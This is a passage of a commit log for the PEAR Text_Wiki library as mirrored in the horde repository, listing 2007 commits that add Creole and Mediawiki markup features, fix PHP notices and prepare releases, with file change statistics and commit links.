Text/Wiki/Render/Creole/Table.php | 14 +++++++++++--- Text/Wiki/Render/Creole/Wikilink.php | 22 ++++++++++++++++++---- 6 files changed, 60 insertions(+), 18 deletions(-) http://github.com/horde/horde/commit/26e3e3b4f5e5b5786121cd71a6d05774bdcdbb9c ----------------------------------------------------------------------- commit 7cd5f73b4cebd4d276ece183d31e5c31df30ebd1 Author: Michele Tomaiuolo Date: Mon Feb 19 08:57:14 2007 +0000 aligning to creole 0.5 + additional markup git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 230214 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Creole.php | 16 +++-- Text/Wiki/Parse/Creole/Blockquote.php | 25 ++++---- Text/Wiki/Parse/Creole/Break.php | 2 +- Text/Wiki/Parse/Creole/Center.php | 78 +++++++++++++++++++++++++ Text/Wiki/Parse/Creole/Footnote.php | 96 ++++++++++++++++++++++++++++++ Text/Wiki/Parse/Creole/Newline.php | 3 +- Text/Wiki/Parse/Creole/Paragraph.php | 4 +- Text/Wiki/Parse/Creole/Raw.php | 62 ++++++++++++++++++++ Text/Wiki/Parse/Creole/Subscript.php | 75 ++++++++++++++++++++++++ Text/Wiki/Parse/Creole/Table.php | 106 +++++++++++++++++++--------------- Text/Wiki/Parse/Creole/Trim.php | 20 ++++--- Text/Wiki/Parse/Creole/Wikilink.php | 2 +- 12 files changed, 416 insertions(+), 73 deletions(-) create mode 100644 Text/Wiki/Parse/Creole/Center.php create mode 100644 Text/Wiki/Parse/Creole/Footnote.php create mode 100644 Text/Wiki/Parse/Creole/Raw.php create mode 100644 Text/Wiki/Parse/Creole/Subscript.php http://github.com/horde/horde/commit/7cd5f73b4cebd4d276ece183d31e5c31df30ebd1 ----------------------------------------------------------------------- commit 7726637cf4182d39212970cb0a637b4c109c156c Author: Michele Tomaiuolo Date: Mon Feb 19 09:32:21 2007 +0000 fixed url/wikilink priority problem git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 230216 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Creole.php | 2 +- Text/Wiki/Parse/Creole/Url.php | 8 +++++--- Text/Wiki/Render/Creole/Url.php | 4 ++-- 3 files changed, 8 insertions(+), 6 deletions(-) http://github.com/horde/horde/commit/7726637cf4182d39212970cb0a637b4c109c156c ----------------------------------------------------------------------- commit 33d7d66317dc25b228136ae82b4daca8407c0808 Author: Michele Tomaiuolo Date: Tue Feb 20 00:11:40 2007 +0000 support for %%% git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 230285 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Parse/Creole/Break.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) http://github.com/horde/horde/commit/33d7d66317dc25b228136ae82b4daca8407c0808 ----------------------------------------------------------------------- commit d6aa14db9722d44b06d3b0b39172084bf5bad16e Author: Michele Tomaiuolo Date: Fri Feb 23 14:19:19 2007 +0000 aligning to creole 0.5 + additional markup experiment with hyphenated lists and footnotes git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 230561 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Creole.php | 2 + Text/Wiki/Parse/Creole/Break.php | 3 +- Text/Wiki/Parse/Creole/Footnote.php | 19 ++------- Text/Wiki/Parse/Creole/List.php | 6 +-- Text/Wiki/Parse/Creole/Trim.php | 5 +++ Text/Wiki/Parse/Creole/Underline.php | 75 +++++++++++++++++++++++++++++++++ Text/Wiki/Render/Creole/Break.php | 2 +- Text/Wiki/Render/Creole/Subscript.php | 2 +- Text/Wiki/Render/Creole/Superscript.php | 2 +- Text/Wiki/Render/Creole/Underline.php | 2 +- Text/Wiki/Render/Creole/Url.php | 11 +++-- Text/Wiki/Render/Creole/Wikilink.php | 2 +- Text/Wiki/Render/Xhtml/Url.php | 4 ++ 13 files changed, 104 insertions(+), 31 deletions(-) create mode 100644 Text/Wiki/Parse/Creole/Underline.php http://github.com/horde/horde/commit/d6aa14db9722d44b06d3b0b39172084bf5bad16e ----------------------------------------------------------------------- commit df205f76961deca7165a2ab28cd85c0ed5766284 Author: Michele Tomaiuolo Date: Thu Mar 1 22:00:30 2007 +0000 email style emphasis git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 231006 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Creole.php | 1 + Text/Wiki/Parse/Creole/Center.php | 2 +- Text/Wiki/Parse/Creole/Emphasis.php | 9 ++++--- Text/Wiki/Parse/Creole/List.php | 46 ++++++++++++++++++------------------ Text/Wiki/Parse/Creole/Newline.php | 2 +- Text/Wiki/Parse/Creole/Strong.php | 9 ++++--- Text/Wiki/Parse/Creole/Table.php | 6 +++-- Text/Wiki/Parse/Creole/Underline.php | 13 ++++++---- Text/Wiki/Parse/Creole/Url.php | 2 +- Text/Wiki/Render/Creole/Center.php | 2 +- packageCreole.xml | 14 +++++++---- 11 files changed, 61 insertions(+), 45 deletions(-) http://github.com/horde/horde/commit/df205f76961deca7165a2ab28cd85c0ed5766284 ----------------------------------------------------------------------- commit 93d8279cdfd712adc32615d80ca08e6d2eb1b36d Author: Michele Tomaiuolo Date: Sat Mar 3 23:00:54 2007 +0000 allows specifying class in options git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 231098 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Render/Xhtml/Box.php | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) http://github.com/horde/horde/commit/93d8279cdfd712adc32615d80ca08e6d2eb1b36d ----------------------------------------------------------------------- commit c6abab41072138f71107b0e580a4ba89a76eaac2 Author: Justin Patrin Date: Mon Mar 12 01:24:04 2007 +0000 Prepare for new release git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 231699 c90b9560-bf6c-de11-be94-00142212c4b1 package.xml | 643 +++++++++++++++++++++++++++++++++-------------------------- package2.xml | 406 ------------------------------------- 2 files changed, 361 insertions(+), 688 deletions(-) delete mode 100644 package2.xml http://github.com/horde/horde/commit/c6abab41072138f71107b0e580a4ba89a76eaac2 ----------------------------------------------------------------------- commit 428289a24fac664f2af3dbea5d645f2652900fb5 Author: Justin Patrin Date: Mon Mar 12 01:25:20 2007 +0000 Correctversion number git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 231700 c90b9560-bf6c-de11-be94-00142212c4b1 package.xml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/428289a24fac664f2af3dbea5d645f2652900fb5 ----------------------------------------------------------------------- commit d9ecd6a34a5e8c46d881c2c221b09082b12e57bf Author: bertrand Gugger Date: Tue Mar 13 11:18:17 2007 +0000 #10148 Simplify the row regexp to work with new PCRE, thanks Mark Wiesemann for the testing and support git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 231777 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Parse/Mediawiki/Table.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) http://github.com/horde/horde/commit/d9ecd6a34a5e8c46d881c2c221b09082b12e57bf ----------------------------------------------------------------------- commit 7245baa8bdf86c8ac2675c4884eade673fe68810 Author: Justin Patrin Date: Thu Mar 15 00:08:47 2007 +0000 If target == '_self' don't add an onclick git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 231896 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Render/Xhtml/Interwiki.php | 2 +- Text/Wiki/Render/Xhtml/Phplookup.php | 2 +- Text/Wiki/Render/Xhtml/Url.php | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) http://github.com/horde/horde/commit/7245baa8bdf86c8ac2675c4884eade673fe68810 ----------------------------------------------------------------------- commit acd883609ea578d22c36fab94f99018011ea4d11 Author: Justin Patrin Date: Thu Mar 15 15:04:50 2007 +0000 Request #10128 use CSS instead of the depracetd align attribute for images. Thanks to ritzmo (Moritz Venn) for the patch git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 231923 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Render/Xhtml/Image.php | 26 +++++++++++++++----------- 1 file changed, 15 insertions(+), 11 deletions(-) http://github.com/horde/horde/commit/acd883609ea578d22c36fab94f99018011ea4d11 ----------------------------------------------------------------------- commit 20215620f62fb36d7948a74ad16230a21d88700c Author: Justin Patrin Date: Thu Mar 15 15:06:05 2007 +0000 Add support for alignment in image links git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 231924 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Parse/Doku/Image.php | 22 +++++++++++++++------- 1 file changed, 15 insertions(+), 7 deletions(-) http://github.com/horde/horde/commit/20215620f62fb36d7948a74ad16230a21d88700c ----------------------------------------------------------------------- commit 7fc7f5f60bc19478b40ccb7dd83207dfa3f1d737 Author: Michele Tomaiuolo Date: Sat May 26 17:15:41 2007 +0000 removed notice about undefined name git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 236400 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Render/Xhtml/Url.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) http://github.com/horde/horde/commit/7fc7f5f60bc19478b40ccb7dd83207dfa3f1d737 ----------------------------------------------------------------------- commit c57c3ab25c5acfb61e51fde39ae64ca053a2281d Author: Michele Tomaiuolo Date: Sat May 26 17:16:18 2007 +0000 removed notices about undefined index git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 236401 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Parse/Creole/Url.php | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/c57c3ab25c5acfb61e51fde39ae64ca053a2281d ----------------------------------------------------------------------- commit 46134bd0646503dc6eaf64f518f0e6a0081eeef8 Author: Michele Tomaiuolo Date: Sat May 26 17:22:41 2007 +0000 removed notice about undefined variable git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 236402 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Parse/Creole/List.php | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/46134bd0646503dc6eaf64f518f0e6a0081eeef8 ----------------------------------------------------------------------- commit a199fb32bcfbab39120460496e3ee4dfc309c395 Author: Michele Tomaiuolo Date: Sat May 26 17:33:01 2007 +0000 removed notice about undefined index git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 236405 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Creole.php | 23 ++++++++++++++++++++++- 1 file changed, 22 insertions(+), 1 deletion(-) http://github.com/horde/horde/commit/a199fb32bcfbab39120460496e3ee4dfc309c395 ----------------------------------------------------------------------- commit 89857801946f29a668fbc9e1a61396f5f3bb1f89 Author: Michele Tomaiuolo Date: Sat May 26 17:47:24 2007 +0000 removed notice about undefined type (in renderer) git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 236407 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Parse/Creole/Footnote.php | 2 +- Text/Wiki/Parse/Creole/Url.php | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) http://github.com/horde/horde/commit/89857801946f29a668fbc9e1a61396f5f3bb1f89 ----------------------------------------------------------------------- commit 901e1452e70bd4f30ff866fa5762d4259fc692b0 Author: Michele Tomaiuolo Date: Sat May 26 18:25:45 2007 +0000 removed notice about undefined 'css' index git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 236408 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Render/Creole/Blockquote.php | 2 +- Text/Wiki/Render/Xhtml/Blockquote.php | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/901e1452e70bd4f30ff866fa5762d4259fc692b0 ----------------------------------------------------------------------- commit 48498aa6d1c53f53645a5f647774ee9293a452d5 Author: Michele Tomaiuolo Date: Sat May 26 18:31:43 2007 +0000 removed notice about undefined 'type' index git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 236409 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Render/Creole/Raw.php | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) http://github.com/horde/horde/commit/48498aa6d1c53f53645a5f647774ee9293a452d5 ----------------------------------------------------------------------- commit fa933393f2faf70360422d0d3d8f6c086f2d560e Author: Michele Tomaiuolo Date: Sat May 26 18:34:14 2007 +0000 various ways to escape end of section git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 236410 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Render/Creole/Preformatted.php | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) http://github.com/horde/horde/commit/fa933393f2faf70360422d0d3d8f6c086f2d560e ----------------------------------------------------------------------- commit 3dc57f41e02ac50135fcc6141eb3acfd0fadcfd1 Author: Michele Tomaiuolo Date: Sat May 26 18:42:02 2007 +0000 removed notice about undefined variable git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 236411 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Creole.php | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) http://github.com/horde/horde/commit/3dc57f41e02ac50135fcc6141eb3acfd0fadcfd1 ----------------------------------------------------------------------- commit 27ebee29082718ada13d9dc4f1e1d0cfb13b8242 Author: Michele Tomaiuolo Date: Sat May 26 18:58:22 2007 +0000 removed notice about undefined variable git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 236413 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Creole.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) http://github.com/horde/horde/commit/27ebee29082718ada13d9dc4f1e1d0cfb13b8242 ----------------------------------------------------------------------- commit 426c149742136f9a734d26152a2ed5e480f51cb9 Author: Michele Tomaiuolo Date: Mon May 28 13:30:10 2007 +0000 escape repeated char git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 236492 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Parse/Creole/Raw.php | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/426c149742136f9a734d26152a2ed5e480f51cb9 ----------------------------------------------------------------------- commit bbe668fb1cda4c04cdbc407ec5a72a38f7e0bca5 Author: Michele Tomaiuolo Date: Mon May 28 13:33:18 2007 +0000 allow numbered lists git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 236493 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Parse/Creole/Trim.php | 22 +++++++++++++++++++--- 1 file changed, 19 insertions(+), 3 deletions(-) http://github.com/horde/horde/commit/bbe668fb1cda4c04cdbc407ec5a72a38f7e0bca5 ----------------------------------------------------------------------- commit 63bb69ca792eff9e410c2bef8cfaaeb170e51537 Author: Michele Tomaiuolo Date: Mon May 28 13:34:27 2007 +0000 restoreraw git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 236494 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Parse/Creole/Wikilink.php | 2 ++ 1 file changed, 2 insertions(+) http://github.com/horde/horde/commit/63bb69ca792eff9e410c2bef8cfaaeb170e51537 ----------------------------------------------------------------------- commit eb32dc924eca29879fa92dc83e46335aa7861bb4 Author: Michele Tomaiuolo Date: Mon May 28 13:36:57 2007 +0000 support escape of closing sequence git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 236495 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Parse/Creole/Preformatted.php | 18 ++++++++++++++++-- Text/Wiki/Parse/Creole/Tt.php | 21 ++++++++++++++++++++- 2 files changed, 36 insertions(+), 3 deletions(-) http://github.com/horde/horde/commit/eb32dc924eca29879fa92dc83e46335aa7861bb4 ----------------------------------------------------------------------- commit 30eb7766a9449626874bff9813ed0fef1c99d6b3 Author: Michele Tomaiuolo Date: Mon May 28 13:38:22 2007 +0000 improve single / emphasis detection git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 236496 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Parse/Creole/Emphasis.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) http://github.com/horde/horde/commit/30eb7766a9449626874bff9813ed0fef1c99d6b3 ----------------------------------------------------------------------- commit 1cebff8cc267289922bb306dcd69d31506186d84 Author: Michele Tomaiuolo Date: Mon May 28 13:38:56 2007 +0000 improve single _ underline detection git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 236497 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Parse/Creole/Underline.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) http://github.com/horde/horde/commit/1cebff8cc267289922bb306dcd69d31506186d84 ----------------------------------------------------------------------- commit e772035bcfef5f471ffab23222e46e1b14642805 Author: Michele Tomaiuolo Date: Mon May 28 13:39:39 2007 +0000 improve single * strong emphasis detection git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 236498 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Parse/Creole/Strong.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) http://github.com/horde/horde/commit/e772035bcfef5f471ffab23222e46e1b14642805 ----------------------------------------------------------------------- commit 49e9c07d385992b42e57b733188a5fdc63411823 Author: Justin Patrin Date: Sat Jun 9 23:11:25 2007 +0000 Bug #11262 Fix issues with any block causing no output git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 237313 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Parse/Default/Code.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) http://github.com/horde/horde/commit/49e9c07d385992b42e57b733188a5fdc63411823 ----------------------------------------------------------------------- commit f4a9ddf7a6edfd4c1f4472a875852db81733eefd Author: Justin Patrin Date: Sat Jun 9 23:17:46 2007 +0000 Bug #10144 Fix all lower-case rule names git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 237315 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki.php | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) http://github.com/horde/horde/commit/f4a9ddf7a6edfd4c1f4472a875852db81733eefd ----------------------------------------------------------------------- commit cc36baefa37ef2fa2ab9242776a379c8c24e1eac Author: Justin Patrin Date: Sun Jun 10 00:03:43 2007 +0000 Prepare for 1.2.0 release git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 237318 c90b9560-bf6c-de11-be94-00142212c4b1 package.xml | 144 +++++++++++++++++++++++++++++++++++++----------------------- 1 file changed, 88 insertions(+), 56 deletions(-) http://github.com/horde/horde/commit/cc36baefa37ef2fa2ab9242776a379c8c24e1eac ----------------------------------------------------------------------- commit d5c87b9131c3ac0825c3dc5f438434cd3e8e8354 Author: Justin Patrin Date: Sun Jun 10 00:04:24 2007 +0000 API should be stable too git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 237319 c90b9560-bf6c-de11-be94-00142212c4b1 package.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) http://github.com/horde/horde/commit/d5c87b9131c3ac0825c3dc5f438434cd3e8e8354 ----------------------------------------------------------------------- commit 317d201eadff7d98083e3bbb1f6d2bafd5da669b Author: Moritz Venn Date: Wed Jul 11 11:27:54 2007 +0000 Fix #11578 by adding

 to Syntax of Code and switching Parsing order with Preformatted
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 239478 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Mediawiki.php            |  2 +-
 Text/Wiki/Parse/Mediawiki/Code.php | 14 ++++++++++----
 2 files changed, 11 insertions(+), 5 deletions(-)

http://github.com/horde/horde/commit/317d201eadff7d98083e3bbb1f6d2bafd5da669b

-----------------------------------------------------------------------

commit fd715de866922ea875e2c6c9ed5aa46f6eb27e79
Author: Moritz Venn 
Date:   Thu Jul 12 19:16:13 2007 +0000

    Implemented #9378
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 239623 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Preformatted.php | 16 +++++++++++++---
 1 file changed, 13 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/fd715de866922ea875e2c6c9ed5aa46f6eb27e79

-----------------------------------------------------------------------

commit 48b294a5d41a82b5e158b19469791dfe8c780a4b
Author: Moritz Venn 
Date:   Thu Jul 12 19:52:50 2007 +0000

    Fix #8450 and probably receive a bug-report for it :-)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 239625 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Table.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/48b294a5d41a82b5e158b19469791dfe8c780a4b

-----------------------------------------------------------------------

commit d1bfcec37a434fb9a66e9f1f2686ae7b034de2df
Author: Moritz Venn 
Date:   Thu Jul 12 20:25:50 2007 +0000

    Implement #8503, thanks Brian
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 239632 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Mediawiki.php               |  1 +
 Text/Wiki/Parse/Mediawiki/Comment.php | 59 +++++++++++++++++++++++++++++++++++
 2 files changed, 60 insertions(+)
 create mode 100755 Text/Wiki/Parse/Mediawiki/Comment.php

http://github.com/horde/horde/commit/d1bfcec37a434fb9a66e9f1f2686ae7b034de2df

-----------------------------------------------------------------------

commit 3588e1729873924e22828b832f5a01936f2e21f8
Author: Michele Tomaiuolo 
Date:   Mon Jul 30 13:14:41 2007 +0000

    upgrade to Creole 1.0 specs
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 240474 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/Image.php         |  2 +-
 Text/Wiki/Parse/Creole/List.php          |  2 +-
 Text/Wiki/Parse/Creole/Preformatted.php  | 14 --------------
 Text/Wiki/Parse/Creole/Raw.php           |  4 +---
 Text/Wiki/Parse/Creole/Trim.php          | 10 +++++-----
 Text/Wiki/Parse/Creole/Tt.php            | 18 ++----------------
 Text/Wiki/Parse/Creole/Url.php           |  8 +++++---
 Text/Wiki/Parse/Creole/Wikilink.php      |  2 +-
 Text/Wiki/Render/Creole/Preformatted.php |  2 --
 Text/Wiki/Render/Creole/Raw.php          | 10 +++-------
 Text/Wiki/Render/Creole/Url.php          |  3 ++-
 11 files changed, 21 insertions(+), 54 deletions(-)

http://github.com/horde/horde/commit/3588e1729873924e22828b832f5a01936f2e21f8

-----------------------------------------------------------------------

commit 8f37ef2651c50152f26d6291de756e23fe18633a
Author: Michele Tomaiuolo 
Date:   Mon Jul 30 14:22:34 2007 +0000

    upgrade to Creole 1.0 specs
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 240476 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/Center.php | 2 +-
 Text/Wiki/Parse/Creole/Image.php  | 3 ++-
 Text/Wiki/Parse/Creole/Trim.php   | 5 -----
 3 files changed, 3 insertions(+), 7 deletions(-)

http://github.com/horde/horde/commit/8f37ef2651c50152f26d6291de756e23fe18633a

-----------------------------------------------------------------------

commit f88a3a248832213270406282e9ba36eb7952f55e
Author: Michele Tomaiuolo 
Date:   Mon Jul 30 19:11:32 2007 +0000

    Box (div) for footnotes
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 240481 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/Box.php | 81 ++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 81 insertions(+)
 create mode 100644 Text/Wiki/Parse/Creole/Box.php

http://github.com/horde/horde/commit/f88a3a248832213270406282e9ba36eb7952f55e

-----------------------------------------------------------------------

commit 42eba138e1b943d8e84f2a674b22342e722c2db4
Author: Michele Tomaiuolo 
Date:   Mon Jul 30 19:18:43 2007 +0000

    Box (div) for footnotes
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 240482 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Creole.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/42eba138e1b943d8e84f2a674b22342e722c2db4

-----------------------------------------------------------------------

commit b142ed7030bc0970e5e0aae00529bb3679db2373
Author: Michele Tomaiuolo 
Date:   Wed Aug 1 07:57:34 2007 +0000

    accept bold par after list
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 240550 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/List.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/b142ed7030bc0970e5e0aae00529bb3679db2373

-----------------------------------------------------------------------

commit 4371c4dbf5c5e41a07f5a0129833e181f1558856
Author: Michele Tomaiuolo 
Date:   Wed Aug 1 10:02:08 2007 +0000

    *** empty log message ***
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 240556 c90b9560-bf6c-de11-be94-00142212c4b1

 packageCreole.xml | 229 +++++++++++++++++++++++++++++++-----------------------
 1 file changed, 131 insertions(+), 98 deletions(-)

http://github.com/horde/horde/commit/4371c4dbf5c5e41a07f5a0129833e181f1558856

-----------------------------------------------------------------------

commit 08e23ec91e01359d00973627fd5cda243d55f3b2
Author: Michele Tomaiuolo 
Date:   Wed Aug 1 11:00:11 2007 +0000

    added support for deflist
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 240560 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Creole.php               |   2 +
 Text/Wiki/Parse/Creole/Deflist.php | 129 +++++++++++++++++++++++++++++++++++++
 Text/Wiki/Parse/Creole/Newline.php |   2 +-
 3 files changed, 132 insertions(+), 1 deletion(-)
 create mode 100644 Text/Wiki/Parse/Creole/Deflist.php

http://github.com/horde/horde/commit/08e23ec91e01359d00973627fd5cda243d55f3b2

-----------------------------------------------------------------------

commit 67ecd5b58053890a23cfdfbedc70622fe4f02202
Author: Michele Tomaiuolo 
Date:   Mon Sep 3 21:09:22 2007 +0000

    free urls can be escaped by a tilde
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 242124 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Creole.php           | 4 +++-
 Text/Wiki/Parse/Creole/Url.php | 2 +-
 2 files changed, 4 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/67ecd5b58053890a23cfdfbedc70622fe4f02202

-----------------------------------------------------------------------

commit 3c68ffc5c6326f3ada0c05b1a1fc90bd030d811d
Author: Michele Tomaiuolo 
Date:   Mon Sep 3 21:16:10 2007 +0000

    single slash parsing moved to Italic.php
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 242125 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/Emphasis.php | 11 +++--
 Text/Wiki/Parse/Creole/Italic.php   | 81 +++++++++++++++++++++++++++++++++++++
 2 files changed, 89 insertions(+), 3 deletions(-)
 create mode 100644 Text/Wiki/Parse/Creole/Italic.php

http://github.com/horde/horde/commit/3c68ffc5c6326f3ada0c05b1a1fc90bd030d811d

-----------------------------------------------------------------------

commit e7495f826bf147f68a99d72f658e79dbf0125910
Author: Michele Tomaiuolo 
Date:   Mon Sep 3 21:17:00 2007 +0000

    single star parsing moved to Bold.php
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 242126 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/Bold.php   | 82 +++++++++++++++++++++++++++++++++++++++
 Text/Wiki/Parse/Creole/Strong.php |  7 ++--
 2 files changed, 86 insertions(+), 3 deletions(-)
 create mode 100644 Text/Wiki/Parse/Creole/Bold.php

http://github.com/horde/horde/commit/e7495f826bf147f68a99d72f658e79dbf0125910

-----------------------------------------------------------------------

commit f5ee69fc435949d690be47f63eb973a98b13216b
Author: Michele Tomaiuolo 
Date:   Mon Sep 3 21:29:36 2007 +0000

    single underscore is now disabled
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 242127 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/Underline.php | 15 ++++++++++-----
 1 file changed, 10 insertions(+), 5 deletions(-)

http://github.com/horde/horde/commit/f5ee69fc435949d690be47f63eb973a98b13216b

-----------------------------------------------------------------------

commit 7417fc762d271f3eda7ba85e31f62bd7694b5e6f
Author: Michele Tomaiuolo 
Date:   Mon Sep 3 21:57:38 2007 +0000

    removed warning about undefined caption
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 242128 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/Table.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/7417fc762d271f3eda7ba85e31f62bd7694b5e6f

-----------------------------------------------------------------------

commit 2585c5bde28498ff33c77d3c64212c158594aea5
Author: Michele Tomaiuolo 
Date:   Mon Sep 3 21:58:21 2007 +0000

